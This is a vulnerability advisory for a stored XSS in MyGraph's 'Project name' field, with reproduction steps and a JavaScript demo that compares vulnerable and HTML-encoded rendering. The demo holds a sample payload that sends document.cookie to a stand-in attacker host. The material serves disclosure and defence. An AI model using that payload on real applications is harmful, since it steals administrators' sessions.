Headline
CVE-2022-39240: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in MyGraph
MyGraph is a permission management system. Versions prior to 1.0.4 are vulnerable to a stored cross-site scripting (XSS) vulnerability in the "Project name" field: script saved there executes in the browser of any administrator who views the project. The original report describes the impact as Remote Code Execution; because this is stored XSS, the code that runs is attacker-controlled JavaScript in the victim's browser session, not a command on the server. This issue is patched in version 1.0.4. There is no known workaround.
Impact
MyGraph is a permission management system. MyGraph version 1.0.3 (and earlier) has a stored XSS vulnerability. After logging in to the MyGraph back end, a user can add XSS payload code in the "Project name" field under "Workbench" - "Knowledge Library" - "My Project" - "New". Because the name is stored and later rendered without output encoding, the payload runs in the browser of every other administrator who views the project, so a remote attacker can steal that user's personal information or session data, or display phishing content from the application's own origin. The original report describes this as a remote code execution vulnerability that can "execute any command, such as whoami"; for a stored XSS the executed code is JavaScript running in the victim's browser with the victim's session, not an operating-system command on the server.
Patches
Fixed in version 1.0.4: https://github.com/renlm/MyGraph
Workarounds
None known. Upgrade to version 1.0.4 or later.
References
None
For more information
Reproduction: log in to the MyGraph back end, open "Workbench" - "Knowledge Library" - "My Project" - "New", enter an XSS payload as the "Project name", and set the project to public. When other administrators access the project, the payload executes in their browsers and the attacker receives their information.
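As an added illustration (not MyGraph's source code, which this advisory does not reproduce), the following JavaScript shows the two halves of the bug described above: a project list that interpolates the stored "Project name" straight into HTML, beside a version that HTML-encodes it at the point of output, plus a small check that lists which element names an HTML parser would see in each result. The project objects, the `isPublic` flag, the attacker payload and the `attacker.example` host are constructed for the example; MyGraph's actual field and template names are assumed, not known.

```javascript
// Added example, not MyGraph's code: how a script stored as a "Project name"
// reaches other administrators' browsers, and how output encoding prevents it.

// Constructed sample data (assumed field names; not MyGraph's data model).
// The attacker saves this as the "Project name" and sets the project to public.
const ATTACKER_PROJECT = {
  name: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
  isPublic: true,
};
const BENIGN_PROJECT = { name: 'Quarterly audit & review', isPublic: true };
// A private project is never shown to other administrators, so its payload
// never fires; this is why the report says "Set to public".
const PRIVATE_PROJECT = { name: '<script>alert(1)</script>', isPublic: false };

// Vulnerable rendering: the stored name is interpolated directly into the page,
// so the browser parses the attacker's tag and fires its onerror handler.
function renderProjectListVulnerable(projects) {
  return projects
    .filter(p => p.isPublic)
    .map(p => `<li class="project">${p.name}</li>`)
    .join('\n');
}

// HTML-encode every character that can start a tag, attribute or entity.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return String(value).replace(/[&<>"'`]/g, ch => map[ch]);
}

// Hardened rendering: same template, untrusted value encoded at the point of output.
function renderProjectListSafe(projects) {
  return projects
    .filter(p => p.isPublic)
    .map(p => `<li class="project">${escapeHtml(p.name)}</li>`)
    .join('\n');
}

// Check: which element names would an HTML parser see in the rendered fragment?
// Only the template's own <li> should appear; anything else came from user input.
function tagNames(html) {
  const names = new Set();
  for (const m of html.matchAll(/<\s*\/?\s*([A-Za-z][A-Za-z0-9]*)/g)) {
    names.add(m[1].toLowerCase());
  }
  return [...names].sort();
}

const projects = [ATTACKER_PROJECT, BENIGN_PROJECT, PRIVATE_PROJECT];
console.log('vulnerable tags:', tagNames(renderProjectListVulnerable(projects))); // → [ 'img', 'li' ]
console.log('safe tags:      ', tagNames(renderProjectListSafe(projects)));       // → [ 'li' ]
```

Encoding is context-specific: `escapeHtml` is correct for text placed between tags, as in this list item; a name that ends up inside a JavaScript string, a URL, or an unquoted attribute needs the encoding for that context, which is why a templating engine that encodes by default is preferable to hand-rolled escaping. Marking the session cookie `HttpOnly` stops `document.cookie` from being read but does not stop the script from acting as the administrator through the application itself, so output encoding is the fix and a Content Security Policy is defence in depth, not a substitute.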